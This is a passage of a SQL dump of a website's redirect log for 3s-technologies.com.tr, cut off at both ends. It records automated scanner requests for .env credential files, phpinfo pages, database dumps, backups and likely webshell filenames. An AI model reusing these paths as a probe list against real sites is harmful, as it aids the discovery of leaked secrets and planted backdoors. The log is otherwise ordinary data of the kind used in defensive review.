20:20:55','0000-00-00 00:00:00',301),(65063,'https://3s-technologies.com.tr/en/ansible/.env',NULL,'','',4,0,'2026-05-18 20:20:56','0000-00-00 00:00:00',301),(65064,'https://3s-technologies.com.tr/en/ci/.env',NULL,'','',4,0,'2026-05-18 20:20:57','0000-00-00 00:00:00',301),(65065,'https://3s-technologies.com.tr/en/cd/.env',NULL,'','',4,0,'2026-05-18 20:20:58','0000-00-00 00:00:00',301),(65066,'https://3s-technologies.com.tr/en/jenkins/.env',NULL,'','',4,0,'2026-05-18 20:20:59','0000-00-00 00:00:00',301),(65067,'https://3s-technologies.com.tr/en/gitlab/.env',NULL,'','',4,0,'2026-05-18 20:20:59','0000-00-00 00:00:00',301),(65068,'https://3s-technologies.com.tr/en/github/.env',NULL,'','',4,0,'2026-05-18 20:21:00','0000-00-00 00:00:00',301),(65069,'https://3s-technologies.com.tr/en/actions/.env',NULL,'','',4,0,'2026-05-18 20:21:01','0000-00-00 00:00:00',301),(65070,'https://3s-technologies.com.tr/en/circleci/.env',NULL,'','',4,0,'2026-05-18 20:21:02','0000-00-00 00:00:00',301),(65071,'https://3s-technologies.com.tr/en/travis/.env',NULL,'','',4,0,'2026-05-18 20:21:03','0000-00-00 00:00:00',301),(65072,'https://3s-technologies.com.tr/en/buildkite/.env',NULL,'','',4,0,'2026-05-18 20:21:04','0000-00-00 00:00:00',301),(65073,'https://3s-technologies.com.tr/en/mysql/.env',NULL,'','',4,0,'2026-05-18 20:21:04','0000-00-00 00:00:00',301),(65074,'https://3s-technologies.com.tr/en/postgres/.env',NULL,'','',4,0,'2026-05-18 20:21:05','0000-00-00 00:00:00',301),(65075,'https://3s-technologies.com.tr/en/mongodb/.env',NULL,'','',4,0,'2026-05-18 20:21:06','0000-00-00 00:00:00',301),(65076,'https://3s-technologies.com.tr/en/redis/.env',NULL,'','',4,0,'2026-05-18 20:21:07','0000-00-00 00:00:00',301),(65077,'https://3s-technologies.com.tr/en/elasticsearch/.env',NULL,'','',4,0,'2026-05-18 20:21:08','0000-00-00 00:00:00',301),(65078,'https://3s-technologies.com.tr/en/rabbitmq/.env',NULL,'','',4,0,'2026-05-18 20:21:09','0000-00-00 00:00:00',301),(65079,'https://3s-technologies.com.tr/en/kafka/.env',NULL,'','',4,0,'2026-05-18 20:21:09','0000-00-00 00:00:00',301),(65080,'https://3s-technologies.com.tr/en/queue/.env',NULL,'','',4,0,'2026-05-18 20:21:10','0000-00-00 00:00:00',301),(65081,'https://3s-technologies.com.tr/en/worker/.env',NULL,'','',4,0,'2026-05-18 20:21:11','0000-00-00 00:00:00',301),(65082,'https://3s-technologies.com.tr/en/job/.env',NULL,'','',4,0,'2026-05-18 20:21:12','0000-00-00 00:00:00',301),(65083,'https://3s-technologies.com.tr/en/test/.env',NULL,'','',4,0,'2026-05-18 20:21:13','0000-00-00 00:00:00',301),(65084,'https://3s-technologies.com.tr/en/qa/.env',NULL,'','',4,0,'2026-05-18 20:21:14','0000-00-00 00:00:00',301),(65085,'https://3s-technologies.com.tr/en/preview/.env',NULL,'','',4,0,'2026-05-18 20:21:14','0000-00-00 00:00:00',301),(65086,'https://3s-technologies.com.tr/en/uat/.env',NULL,'','',4,0,'2026-05-18 20:21:16','0000-00-00 00:00:00',301),(65087,'https://3s-technologies.com.tr/en/stage/.env',NULL,'','',4,0,'2026-05-18 20:21:17','0000-00-00 00:00:00',301),(65088,'https://3s-technologies.com.tr/en/development/.env',NULL,'','',4,0,'2026-05-18 20:21:18','0000-00-00 00:00:00',301),(65089,'https://3s-technologies.com.tr/en/production/.env',NULL,'','',4,0,'2026-05-18 20:21:18','0000-00-00 00:00:00',301),(65090,'https://3s-technologies.com.tr/en/config/app/.env',NULL,'','',4,0,'2026-05-18 20:21:19','0000-00-00 00:00:00',301),(65091,'https://3s-technologies.com.tr/en/phpinfo.php.bak',NULL,'','',2,0,'2026-05-18 20:21:46','0000-00-00 00:00:00',301),(65092,'https://3s-technologies.com.tr/en/phpinfo.php.old',NULL,'','',2,0,'2026-05-18 20:21:47','0000-00-00 00:00:00',301),(65093,'https://3s-technologies.com.tr/en/phpinfo.php~',NULL,'','',2,0,'2026-05-18 20:21:48','0000-00-00 00:00:00',301),(65094,'https://3s-technologies.com.tr/en/info.php.bak',NULL,'','',2,0,'2026-05-18 20:21:49','0000-00-00 00:00:00',301),(65095,'https://3s-technologies.com.tr/en/phpinfo.php.save',NULL,'','',2,0,'2026-05-18 20:21:50','0000-00-00 00:00:00',301),(65096,'https://3s-technologies.com.tr/en/staging/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:21:51','0000-00-00 00:00:00',301),(65097,'https://3s-technologies.com.tr/en/beta/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:21:51','0000-00-00 00:00:00',301),(65098,'https://3s-technologies.com.tr/en/uat/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:21:53','0000-00-00 00:00:00',301),(65099,'https://3s-technologies.com.tr/en/qa/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:21:54','0000-00-00 00:00:00',301),(65100,'https://3s-technologies.com.tr/en/preview/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:21:55','0000-00-00 00:00:00',301),(65101,'https://3s-technologies.com.tr/en/www/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:21:56','0000-00-00 00:00:00',301),(65102,'https://3s-technologies.com.tr/en/htdocs/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:21:57','0000-00-00 00:00:00',301),(65103,'https://3s-technologies.com.tr/en/public_html/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:21:57','0000-00-00 00:00:00',301),(65104,'https://3s-technologies.com.tr/en/site/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:21:58','0000-00-00 00:00:00',301),(65105,'https://3s-technologies.com.tr/en/docs/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:21:59','0000-00-00 00:00:00',301),(65106,'https://3s-technologies.com.tr/en/wp-admin/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:22:00','0000-00-00 00:00:00',301),(65107,'https://3s-technologies.com.tr/en/administrator/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:22:01','0000-00-00 00:00:00',301),(65108,'https://3s-technologies.com.tr/en/core/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:22:01','0000-00-00 00:00:00',301),(65109,'https://3s-technologies.com.tr/en/includes/phpinfo.php',NULL,'','',2,0,'2026-05-18 20:22:02','0000-00-00 00:00:00',301),(65110,'http://3s-technologies.com.tr/tr/wp-content/plugins/burst-statistics/readme.txt',NULL,'','',1,0,'2026-05-19 10:14:55','0000-00-00 00:00:00',301),(65111,'http://3s-technologies.com.tr/tr/ws54.php',NULL,'','',3,0,'2026-05-19 19:44:43','0000-00-00 00:00:00',301),(65112,'http://3s-technologies.com.tr/tr/deepseek_d.php',NULL,'','',2,0,'2026-05-19 19:44:44','0000-00-00 00:00:00',301),(65113,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag/il.php',NULL,'','',3,0,'2026-05-19 19:44:53','0000-00-00 00:00:00',301),(65114,'http://3s-technologies.com.tr/tr/wap.php',NULL,'','',3,0,'2026-05-19 19:44:58','0000-00-00 00:00:00',301),(65115,'http://3s-technologies.com.tr/tr/sagax1.php',NULL,'','',3,0,'2026-05-19 19:45:23','0000-00-00 00:00:00',301),(65116,'http://3s-technologies.com.tr/tr/zup.php73',NULL,'','',2,0,'2026-05-19 19:45:27','0000-00-00 00:00:00',301),(65117,'http://3s-technologies.com.tr/tr/wp-blink.php',NULL,'','',3,0,'2026-05-19 19:45:29','0000-00-00 00:00:00',301),(65118,'http://3s-technologies.com.tr/tr/wp-content/uploads/min.php',NULL,'','',2,0,'2026-05-19 19:45:38','0000-00-00 00:00:00',301),(65119,'http://3s-technologies.com.tr/tr/zoom1.php',NULL,'','',2,0,'2026-05-19 19:45:39','0000-00-00 00:00:00',301),(65120,'http://3s-technologies.com.tr/tr/vc.php',NULL,'','',2,0,'2026-05-19 19:45:45','0000-00-00 00:00:00',301),(65121,'http://3s-technologies.com.tr/tr/wp-content/min.php',NULL,'','',3,0,'2026-05-19 19:45:49','0000-00-00 00:00:00',301),(65122,'http://3s-technologies.com.tr/tr/storage/index.php',NULL,'','',3,0,'2026-05-19 19:45:59','0000-00-00 00:00:00',301),(65123,'http://3s-technologies.com.tr/tr/wp-includes/min.php',NULL,'','',3,0,'2026-05-19 19:46:02','0000-00-00 00:00:00',301),(65124,'http://3s-technologies.com.tr/tr/storage/rip.php',NULL,'','',3,0,'2026-05-19 19:46:14','0000-00-00 00:00:00',301),(65125,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag/b.php',NULL,'','',3,0,'2026-05-19 19:46:21','0000-00-00 00:00:00',301),(65126,'http://3s-technologies.com.tr/tr/breads1.php',NULL,'','',4,0,'2026-05-19 19:46:52','0000-00-00 00:00:00',301),(65127,'http://3s-technologies.com.tr/tr/must.php',NULL,'','',4,0,'2026-05-19 19:46:53','0000-00-00 00:00:00',301),(65128,'http://3s-technologies.com.tr/tr/wp-content/155.php',NULL,'','',4,0,'2026-05-19 19:46:56','0000-00-00 00:00:00',301),(65129,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/il.php',NULL,'','',3,0,'2026-05-19 19:47:14','0000-00-00 00:00:00',301),(65130,'http://3s-technologies.com.tr/tr/zup.php',NULL,'','',4,0,'2026-05-19 19:47:16','0000-00-00 00:00:00',301),(65131,'http://3s-technologies.com.tr/tr/paku.php',NULL,'','',4,0,'2026-05-19 19:47:22','0000-00-00 00:00:00',301),(65132,'http://3s-technologies.com.tr/tr/wp-admin/min.php',NULL,'','',3,0,'2026-05-19 19:47:26','0000-00-00 00:00:00',301),(65133,'http://3s-technologies.com.tr/tr/wp-admin/wp-fileesx-449.php',NULL,'','',3,0,'2026-05-19 19:47:26','0000-00-00 00:00:00',301),(65134,'http://3s-technologies.com.tr/tr/wp-content/themes/min.php',NULL,'','',3,0,'2026-05-19 19:47:27','0000-00-00 00:00:00',301),(65135,'http://3s-technologies.com.tr/tr/wp-content/themes/x/bypass.php',NULL,'','',3,0,'2026-05-19 19:47:28','0000-00-00 00:00:00',301),(65136,'http://3s-technologies.com.tr/tr/wp-includes/interactivity-api/index.php',NULL,'','',3,0,'2026-05-19 19:47:29','0000-00-00 00:00:00',301),(65137,'http://3s-technologies.com.tr/tr/wp-wordfence-waf.php',NULL,'','',3,0,'2026-05-19 19:47:31','0000-00-00 00:00:00',301),(65138,'http://3s-technologies.com.tr/tr/sagax.php',NULL,'','',4,0,'2026-05-19 19:47:39','0000-00-00 00:00:00',301),(65139,'http://3s-technologies.com.tr/tr/wp-admin/wp-teest.php',NULL,'','',3,0,'2026-05-19 19:47:40','0000-00-00 00:00:00',301),(65140,'http://3s-technologies.com.tr/tr/wp-content/plugins/ftde.php',NULL,'','',3,0,'2026-05-19 19:47:41','0000-00-00 00:00:00',301),(65141,'http://mail.3s-technologies.com.tr/tr/ight.php',NULL,'','',1,0,'2026-05-20 23:29:54','0000-00-00 00:00:00',301),(65142,'http://mail.3s-technologies.com.tr/tr/wpns.php',NULL,'','',1,0,'2026-05-20 23:29:54','0000-00-00 00:00:00',301),(65143,'http://mail.3s-technologies.com.tr/tr/lang/es.php',NULL,'','',1,0,'2026-05-20 23:29:57','0000-00-00 00:00:00',301),(65144,'http://mail.3s-technologies.com.tr/tr/getir.php',NULL,'','',1,0,'2026-05-20 23:29:58','0000-00-00 00:00:00',301),(65145,'http://mail.3s-technologies.com.tr/tr/core/init.php',NULL,'','',1,0,'2026-05-20 23:29:59','0000-00-00 00:00:00',301),(65146,'http://mail.3s-technologies.com.tr/tr/phpinfo/info.php',NULL,'','',1,0,'2026-05-20 23:30:24','0000-00-00 00:00:00',301),(65147,'http://mail.3s-technologies.com.tr/tr/wp-theme.php',NULL,'','',1,0,'2026-05-20 23:31:42','0000-00-00 00:00:00',301),(65148,'http://mail.3s-technologies.com.tr/tr/z.ph',NULL,'','',1,0,'2026-05-20 23:31:56','0000-00-00 00:00:00',301),(65149,'https://3s-technologies.com.tr/tr/sitemap-1.xml',NULL,'','',1,0,'2026-05-21 23:44:47','0000-00-00 00:00:00',301),(65150,'https://3s-technologies.com.tr/tr/api/config',NULL,'https://3s-technologies.com.tr/api/config','',2,0,'2026-05-22 08:35:13','0000-00-00 00:00:00',301),(65151,'https://3s-technologies.com.tr/tr/api/env',NULL,'https://3s-technologies.com.tr/api/env','',1,0,'2026-05-22 08:35:20','0000-00-00 00:00:00',301),(65152,'https://3s-technologies.com.tr/tr/media/system/js/html5fallback.js.map',NULL,'https://3s-technologies.com.tr/media/system/js/html5fallback.js.map','',1,0,'2026-05-22 08:35:21','0000-00-00 00:00:00',301),(65153,'http://3s-technologies.com.tr/tr/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings',NULL,'http://3s-technologies.com.tr/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings','',1,0,'2026-05-22 12:26:35','0000-00-00 00:00:00',301),(65154,'http://mail.3s-technologies.com.tr/tr/public/css.php',NULL,'','',1,0,'2026-05-22 13:27:23','0000-00-00 00:00:00',301),(65155,'http://mail.3s-technologies.com.tr/tr/admin/controller/extension/extension/ultra.php',NULL,'','',1,0,'2026-05-22 13:27:29','0000-00-00 00:00:00',301),(65156,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/compat3x/css',NULL,'','',1,0,'2026-05-22 13:27:49','0000-00-00 00:00:00',301),(65157,'http://mail.3s-technologies.com.tr/tr/wp-content/x/index.php',NULL,'','',1,0,'2026-05-22 13:27:59','0000-00-00 00:00:00',301),(65158,'http://mail.3s-technologies.com.tr/tr/wp-includes/blocks/shortcode/index.php',NULL,'','',1,0,'2026-05-22 13:28:21','0000-00-00 00:00:00',301),(65159,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/smilies',NULL,'','',1,0,'2026-05-22 13:28:21','0000-00-00 00:00:00',301),(65160,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/goods.php',NULL,'','',1,0,'2026-05-22 13:28:27','0000-00-00 00:00:00',301),(65161,'http://mail.3s-technologies.com.tr/tr/wp-includes/rest-api',NULL,'','',1,0,'2026-05-22 13:28:31','0000-00-00 00:00:00',301),(65162,'http://mail.3s-technologies.com.tr/tr/tes.php',NULL,'','',1,0,'2026-05-22 13:28:35','0000-00-00 00:00:00',301),(65163,'http://mail.3s-technologies.com.tr/tr/images/images/about.php',NULL,'','',1,0,'2026-05-22 13:28:38','0000-00-00 00:00:00',301),(65164,'http://mail.3s-technologies.com.tr/tr/wp-includes/block-bindings',NULL,'','',2,0,'2026-05-22 13:28:43','0000-00-00 00:00:00',301),(65165,'http://mail.3s-technologies.com.tr/tr/wp-includes/php-compat',NULL,'','',1,0,'2026-05-22 13:28:56','0000-00-00 00:00:00',301),(65166,'http://3s-technologies.com.tr/tr/sitemap-index.xml.gz',NULL,'','',1,0,'2026-05-22 14:41:18','0000-00-00 00:00:00',301),(65167,'http://3s-technologies.com.tr/en/wp-content/backup-',NULL,'','',1,0,'2026-05-22 17:23:54','0000-00-00 00:00:00',301),(65168,'http://3s-technologies.com.tr/en/wp-content/uploads/2012',NULL,'','',1,0,'2026-05-22 17:23:55','0000-00-00 00:00:00',301),(65169,'http://3s-technologies.com.tr/en/wp-content/uploads/2013',NULL,'','',1,0,'2026-05-22 17:23:55','0000-00-00 00:00:00',301),(65170,'http://3s-technologies.com.tr/en/wp-content/uploads/2014',NULL,'','',1,0,'2026-05-22 17:23:56','0000-00-00 00:00:00',301),(65171,'http://3s-technologies.com.tr/en/wp-content/uploads/2015',NULL,'','',1,0,'2026-05-22 17:23:56','0000-00-00 00:00:00',301),(65172,'http://3s-technologies.com.tr/en/wp-content/uploads/2016',NULL,'','',1,0,'2026-05-22 17:23:57','0000-00-00 00:00:00',301),(65173,'http://3s-technologies.com.tr/en/wp-content/uploads/2017',NULL,'','',1,0,'2026-05-22 17:23:58','0000-00-00 00:00:00',301),(65174,'http://3s-technologies.com.tr/en/wp-content/uploads/2018',NULL,'','',1,0,'2026-05-22 17:23:58','0000-00-00 00:00:00',301),(65175,'http://3s-technologies.com.tr/en/wp-content/uploads/2019',NULL,'','',1,0,'2026-05-22 17:23:59','0000-00-00 00:00:00',301),(65176,'http://3s-technologies.com.tr/en/wp-content/uploads/2020',NULL,'','',1,0,'2026-05-22 17:23:59','0000-00-00 00:00:00',301),(65177,'http://3s-technologies.com.tr/en/wp-content/uploads/2021',NULL,'','',1,0,'2026-05-22 17:24:00','0000-00-00 00:00:00',301),(65178,'http://3s-technologies.com.tr/en/wp-content/uploads/2022',NULL,'','',1,0,'2026-05-22 17:24:00','0000-00-00 00:00:00',301),(65179,'http://3s-technologies.com.tr/en/wp-content/uploads/2026',NULL,'','',1,0,'2026-05-22 17:24:03','0000-00-00 00:00:00',301),(65180,'http://3s-technologies.com.tr/en/storage',NULL,'','',1,0,'2026-05-22 17:24:04','0000-00-00 00:00:00',301),(65181,'http://3s-technologies.com.tr/en/storage/app',NULL,'','',1,0,'2026-05-22 17:24:04','0000-00-00 00:00:00',301),(65182,'http://3s-technologies.com.tr/en/storage/framework',NULL,'','',1,0,'2026-05-22 17:24:05','0000-00-00 00:00:00',301),(65183,'http://3s-technologies.com.tr/en/storage/logs',NULL,'','',1,0,'2026-05-22 17:24:05','0000-00-00 00:00:00',301),(65184,'http://3s-technologies.com.tr/en/bootstrap',NULL,'','',1,0,'2026-05-22 17:24:06','0000-00-00 00:00:00',301),(65185,'http://3s-technologies.com.tr/en/bootstrap/cache',NULL,'','',1,0,'2026-05-22 17:24:06','0000-00-00 00:00:00',301),(65186,'http://3s-technologies.com.tr/en/config',NULL,'','',1,0,'2026-05-22 17:24:07','0000-00-00 00:00:00',301),(65187,'http://3s-technologies.com.tr/en/database',NULL,'','',1,0,'2026-05-22 17:24:07','0000-00-00 00:00:00',301),(65188,'http://3s-technologies.com.tr/en/database/migrations',NULL,'','',1,0,'2026-05-22 17:24:08','0000-00-00 00:00:00',301),(65189,'http://3s-technologies.com.tr/en/database/seeders',NULL,'','',1,0,'2026-05-22 17:24:08','0000-00-00 00:00:00',301),(65190,'http://3s-technologies.com.tr/en/resources',NULL,'','',1,0,'2026-05-22 17:24:09','0000-00-00 00:00:00',301),(65191,'http://3s-technologies.com.tr/en/resources/views',NULL,'','',1,0,'2026-05-22 17:24:09','0000-00-00 00:00:00',301),(65192,'http://3s-technologies.com.tr/en/routes',NULL,'','',1,0,'2026-05-22 17:24:09','0000-00-00 00:00:00',301),(65193,'http://3s-technologies.com.tr/en/public/uploads',NULL,'','',1,0,'2026-05-22 17:24:10','0000-00-00 00:00:00',301),(65194,'http://3s-technologies.com.tr/en/public/storage',NULL,'','',1,0,'2026-05-22 17:24:11','0000-00-00 00:00:00',301),(65195,'http://3s-technologies.com.tr/en/vendor/bin',NULL,'','',1,0,'2026-05-22 17:24:12','0000-00-00 00:00:00',301),(65196,'http://3s-technologies.com.tr/en/sites',NULL,'','',1,0,'2026-05-22 17:24:15','0000-00-00 00:00:00',301),(65197,'http://3s-technologies.com.tr/en/sites/default',NULL,'','',1,0,'2026-05-22 17:24:15','0000-00-00 00:00:00',301),(65198,'http://3s-technologies.com.tr/en/sites/all/modules',NULL,'','',1,0,'2026-05-22 17:24:16','0000-00-00 00:00:00',301),(65199,'http://3s-technologies.com.tr/en/sites/all/themes',NULL,'','',1,0,'2026-05-22 17:24:17','0000-00-00 00:00:00',301),(65200,'http://3s-technologies.com.tr/en/core',NULL,'','',2,0,'2026-05-22 17:24:17','0000-00-00 00:00:00',301),(65201,'http://3s-technologies.com.tr/en/modules/contrib',NULL,'','',1,0,'2026-05-22 17:24:18','0000-00-00 00:00:00',301),(65202,'http://3s-technologies.com.tr/en/themes/contrib',NULL,'','',1,0,'2026-05-22 17:24:18','0000-00-00 00:00:00',301),(65203,'http://3s-technologies.com.tr/en/profiles',NULL,'','',2,0,'2026-05-22 17:24:19','0000-00-00 00:00:00',301),(65204,'http://3s-technologies.com.tr/en/app',NULL,'','',1,0,'2026-05-22 17:24:19','0000-00-00 00:00:00',301),(65205,'http://3s-technologies.com.tr/en/app/code',NULL,'','',1,0,'2026-05-22 17:24:20','0000-00-00 00:00:00',301),(65206,'http://3s-technologies.com.tr/en/app/design',NULL,'','',1,0,'2026-05-22 17:24:20','0000-00-00 00:00:00',301),(65207,'http://3s-technologies.com.tr/en/var',NULL,'','',1,0,'2026-05-22 17:24:21','0000-00-00 00:00:00',301),(65208,'http://3s-technologies.com.tr/en/var/log',NULL,'','',1,0,'2026-05-22 17:24:21','0000-00-00 00:00:00',301),(65209,'http://3s-technologies.com.tr/en/var/cache',NULL,'','',1,0,'2026-05-22 17:24:22','0000-00-00 00:00:00',301),(65210,'http://3s-technologies.com.tr/en/media/catalog',NULL,'','',1,0,'2026-05-22 17:24:22','0000-00-00 00:00:00',301),(65211,'http://3s-technologies.com.tr/en/backups',NULL,'','',1,0,'2026-05-22 17:24:23','0000-00-00 00:00:00',301),(65212,'http://3s-technologies.com.tr/en/caches',NULL,'','',1,0,'2026-05-22 17:24:25','0000-00-00 00:00:00',301),(65213,'http://3s-technologies.com.tr/en/uploads/backup',NULL,'','',1,0,'2026-05-22 17:24:26','0000-00-00 00:00:00',301),(65214,'http://3s-technologies.com.tr/en/assets/uploads',NULL,'','',1,0,'2026-05-22 17:24:27','0000-00-00 00:00:00',301),(65215,'http://3s-technologies.com.tr/en/static',NULL,'','',1,0,'2026-05-22 17:24:28','0000-00-00 00:00:00',301),(65216,'http://3s-technologies.com.tr/en/old_website',NULL,'','',1,0,'2026-05-22 17:24:29','0000-00-00 00:00:00',301),(65217,'http://3s-technologies.com.tr/en/archive',NULL,'','',2,0,'2026-05-22 17:24:29','0000-00-00 00:00:00',301),(65218,'http://3s-technologies.com.tr/en/previous_version',NULL,'','',1,0,'2026-05-22 17:24:30','0000-00-00 00:00:00',301),(65219,'http://3s-technologies.com.tr/en/storage/app/public',NULL,'','',1,0,'2026-05-22 17:24:36','0000-00-00 00:00:00',301),(65220,'http://3s-technologies.com.tr/en/storage/app/private',NULL,'','',1,0,'2026-05-22 17:24:37','0000-00-00 00:00:00',301),(65221,'http://3s-technologies.com.tr/en/storage/framework/cache',NULL,'','',1,0,'2026-05-22 17:24:37','0000-00-00 00:00:00',301),(65222,'http://3s-technologies.com.tr/en/storage/framework/sessions',NULL,'','',2,0,'2026-05-22 17:24:38','0000-00-00 00:00:00',301),(65223,'http://3s-technologies.com.tr/en/storage/framework/testing',NULL,'','',1,0,'2026-05-22 17:24:38','0000-00-00 00:00:00',301),(65224,'http://3s-technologies.com.tr/en/storage/framework/views',NULL,'','',2,0,'2026-05-22 17:24:39','0000-00-00 00:00:00',301),(65225,'http://3s-technologies.com.tr/en/wp-content/uploads/sucuri',NULL,'','',1,0,'2026-05-22 17:24:41','0000-00-00 00:00:00',301),(65226,'http://3s-technologies.com.tr/en/wp-content/uploads/backwpup-*',NULL,'','',1,0,'2026-05-22 17:24:42','0000-00-00 00:00:00',301),(65227,'http://3s-technologies.com.tr/en/import',NULL,'','',1,0,'2026-05-22 17:24:42','0000-00-00 00:00:00',301),(65228,'http://3s-technologies.com.tr/en/export',NULL,'','',1,0,'2026-05-22 17:24:43','0000-00-00 00:00:00',301),(65229,'http://3s-technologies.com.tr/en/imports',NULL,'','',1,0,'2026-05-22 17:24:43','0000-00-00 00:00:00',301),(65230,'http://3s-technologies.com.tr/en/exports',NULL,'','',1,0,'2026-05-22 17:24:43','0000-00-00 00:00:00',301),(65231,'http://3s-technologies.com.tr/en/import_export',NULL,'','',1,0,'2026-05-22 17:24:44','0000-00-00 00:00:00',301),(65232,'http://3s-technologies.com.tr/en/import-export',NULL,'','',1,0,'2026-05-22 17:24:45','0000-00-00 00:00:00',301),(65233,'http://3s-technologies.com.tr/en/data_import',NULL,'','',1,0,'2026-05-22 17:24:45','0000-00-00 00:00:00',301),(65234,'http://3s-technologies.com.tr/en/data_export',NULL,'','',1,0,'2026-05-22 17:24:45','0000-00-00 00:00:00',301),(65235,'http://3s-technologies.com.tr/en/csv_import',NULL,'','',1,0,'2026-05-22 17:24:46','0000-00-00 00:00:00',301),(65236,'http://3s-technologies.com.tr/en/csv_export',NULL,'','',1,0,'2026-05-22 17:24:46','0000-00-00 00:00:00',301),(65237,'http://3s-technologies.com.tr/en/xml_import',NULL,'','',1,0,'2026-05-22 17:24:47','0000-00-00 00:00:00',301),(65238,'http://3s-technologies.com.tr/en/xml_export',NULL,'','',1,0,'2026-05-22 17:24:47','0000-00-00 00:00:00',301),(65239,'http://3s-technologies.com.tr/en/excel_import',NULL,'','',1,0,'2026-05-22 17:24:48','0000-00-00 00:00:00',301),(65240,'http://3s-technologies.com.tr/en/excel_export',NULL,'','',1,0,'2026-05-22 17:24:48','0000-00-00 00:00:00',301),(65241,'http://3s-technologies.com.tr/en/bulk_import',NULL,'','',1,0,'2026-05-22 17:24:49','0000-00-00 00:00:00',301),(65242,'http://3s-technologies.com.tr/en/bulk_export',NULL,'','',1,0,'2026-05-22 17:24:50','0000-00-00 00:00:00',301),(65243,'http://3s-technologies.com.tr/en/migrations',NULL,'','',1,0,'2026-05-22 17:24:50','0000-00-00 00:00:00',301),(65244,'http://3s-technologies.com.tr/en/seeds',NULL,'','',1,0,'2026-05-22 17:24:51','0000-00-00 00:00:00',301),(65245,'http://3s-technologies.com.tr/en/seeders',NULL,'','',1,0,'2026-05-22 17:24:52','0000-00-00 00:00:00',301),(65246,'http://3s-technologies.com.tr/en/dump',NULL,'','',1,0,'2026-05-22 17:24:52','0000-00-00 00:00:00',301),(65247,'http://3s-technologies.com.tr/en/dumps',NULL,'','',1,0,'2026-05-22 17:24:53','0000-00-00 00:00:00',301),(65248,'http://3s-technologies.com.tr/en/sql_dump',NULL,'','',1,0,'2026-05-22 17:24:53','0000-00-00 00:00:00',301),(65249,'http://3s-technologies.com.tr/en/database_dump',NULL,'','',1,0,'2026-05-22 17:24:54','0000-00-00 00:00:00',301),(65250,'http://3s-technologies.com.tr/en/backup_db',NULL,'','',1,0,'2026-05-22 17:24:54','0000-00-00 00:00:00',301),(65251,'http://3s-technologies.com.tr/en/db_backup',NULL,'','',1,0,'2026-05-22 17:24:55','0000-00-00 00:00:00',301),(65252,'http://3s-technologies.com.tr/en/db_dump',NULL,'','',1,0,'2026-05-22 17:24:55','0000-00-00 00:00:00',301),(65253,'http://3s-technologies.com.tr/en/mysql_dump',NULL,'','',1,0,'2026-05-22 17:24:56','0000-00-00 00:00:00',301),(65254,'http://3s-technologies.com.tr/en/postgres_dump',NULL,'','',1,0,'2026-05-22 17:24:56','0000-00-00 00:00:00',301),(65255,'http://3s-technologies.com.tr/en/api',NULL,'','',1,0,'2026-05-22 17:24:57','0000-00-00 00:00:00',301),(65256,'http://3s-technologies.com.tr/en/api/v1',NULL,'','',1,0,'2026-05-22 17:24:58','0000-00-00 00:00:00',301),(65257,'http://3s-technologies.com.tr/en/api/v2',NULL,'','',1,0,'2026-05-22 17:24:59','0000-00-00 00:00:00',301),(65258,'http://3s-technologies.com.tr/en/api/docs',NULL,'','',1,0,'2026-05-22 17:25:00','0000-00-00 00:00:00',301),(65259,'http://3s-technologies.com.tr/en/swagger',NULL,'','',1,0,'2026-05-22 17:25:01','0000-00-00 00:00:00',301),(65260,'http://3s-technologies.com.tr/en/postman',NULL,'','',1,0,'2026-05-22 17:25:01','0000-00-00 00:00:00',301),(65261,'http://3s-technologies.com.tr/en/docs',NULL,'','',1,0,'2026-05-22 17:25:02','0000-00-00 00:00:00',301),(65262,'http://3s-technologies.com.tr/en/documentation',NULL,'','',1,0,'2026-05-22 17:25:03','0000-00-00 00:00:00',301),(65263,'http://3s-technologies.com.tr/en/apidoc',NULL,'','',1,0,'2026-05-22 17:25:03','0000-00-00 00:00:00',301),(65264,'http://3s-technologies.com.tr/en/redoc',NULL,'','',1,0,'2026-05-22 17:25:04','0000-00-00 00:00:00',301),(65265,'http://3s-technologies.com.tr/en/uploads/temp',NULL,'','',1,0,'2026-05-22 17:25:04','0000-00-00 00:00:00',301),(65266,'http://3s-technologies.com.tr/en/uploads/tmp',NULL,'','',1,0,'2026-05-22 17:25:05','0000-00-00 00:00:00',301),(65267,'http://3s-technologies.com.tr/en/uploads/import',NULL,'','',1,0,'2026-05-22 17:25:05','0000-00-00 00:00:00',301),(65268,'http://3s-technologies.com.tr/en/uploads/export',NULL,'','',1,0,'2026-05-22 17:25:06','0000-00-00 00:00:00',301),(65269,'http://3s-technologies.com.tr/en/media/temp',NULL,'','',1,0,'2026-05-22 17:25:06','0000-00-00 00:00:00',301),(65270,'http://3s-technologies.com.tr/en/media/import',NULL,'','',1,0,'2026-05-22 17:25:07','0000-00-00 00:00:00',301),(65271,'http://3s-technologies.com.tr/en/media/export',NULL,'','',1,0,'2026-05-22 17:25:07','0000-00-00 00:00:00',301),(65272,'http://3s-technologies.com.tr/en/temp_upload',NULL,'','',1,0,'2026-05-22 17:25:08','0000-00-00 00:00:00',301),(65273,'http://3s-technologies.com.tr/en/tmp_upload',NULL,'','',1,0,'2026-05-22 17:25:08','0000-00-00 00:00:00',301),(65274,'http://3s-technologies.com.tr/en/staging',NULL,'','',1,0,'2026-05-22 17:25:09','0000-00-00 00:00:00',301),(65275,'http://3s-technologies.com.tr/en/stage',NULL,'','',1,0,'2026-05-22 17:25:09','0000-00-00 00:00:00',301),(65276,'http://3s-technologies.com.tr/en/dev',NULL,'','',1,0,'2026-05-22 17:25:10','0000-00-00 00:00:00',301),(65277,'http://3s-technologies.com.tr/en/development',NULL,'','',1,0,'2026-05-22 